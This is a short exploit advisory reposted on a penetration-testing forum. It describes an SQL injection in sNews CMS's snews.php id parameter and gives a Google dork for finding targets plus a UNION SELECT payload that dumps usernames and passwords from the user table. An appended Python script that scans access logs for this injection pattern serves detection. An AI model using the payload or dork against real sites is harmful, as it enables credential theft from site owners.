China Network Penetration Testing Alliance

Title: CMS snews SQL Injection and Fix

Author: admin    Time: 2013-1-23 08:55
Title: CMS snews SQL Injection Vulnerability
Author: By onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keywords: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*


Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*
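
A defensive check for the request pattern shown in the example above, added here and not part of the original post or of sNews itself: it scans web-server access-log lines for snews.php?act=shownews requests whose id is not a plain integer, after undoing URL-encoding and stripping the /**/ comments used in place of spaces. The log lines are constructed samples, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

COMMENT = re.compile(r"/\*.*?\*/", re.S)  # /**/ used in place of spaces
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Jan/2013:08:01:02 +0000] "GET /snews/snews.php?act=shownews&id=42 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [23/Jan/2013:08:03:10 +0000] "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,2,3,4,5,6/* HTTP/1.1" 200 4870',
    '198.51.100.9 - - [23/Jan/2013:08:03:12 +0000] "GET /snews/snews.php?act=shownews&id=1%2520UNION%2520ALL%2520SELECT%25201 HTTP/1.1" 200 4870',
    '198.51.100.4 - - [23/Jan/2013:08:05:00 +0000] "GET /snews/snews.php?act=shownews&id=12%27 HTTP/1.1" 200 310',
    '198.51.100.4 - - [23/Jan/2013:08:06:00 +0000] "GET /snews/snews.php?act=other&id=abc HTTP/1.1" 200 310',
]

def normalize(value):
    """Undo nested URL-encoding, then turn SQL comments into single spaces."""
    for _ in range(3):  # bounded loop: handles double-encoded values
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = COMMENT.sub(" ", value).replace("/*", " ")  # incl. unterminated /*
    return re.sub(r"\s+", " ", value).strip()

def classify_id(raw_id):
    """Return 'ok', 'union_select' or 'non_numeric' for a shownews id value."""
    value = normalize(raw_id)
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    return "union_select" if UNION_SELECT.search(value) else "non_numeric"

def scan(log_lines):
    """Return (line_number, verdict) for each suspicious shownews request."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        query = parse_qs(url.query, keep_blank_values=True)
        if not url.path.endswith("/snews.php") or query.get("act") != ["shownews"]:
            continue
        for raw_id in query.get("id", [""]):
            verdict = classify_id(raw_id)
            if verdict != "ok":
                findings.append((number, verdict))
    return findings
```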



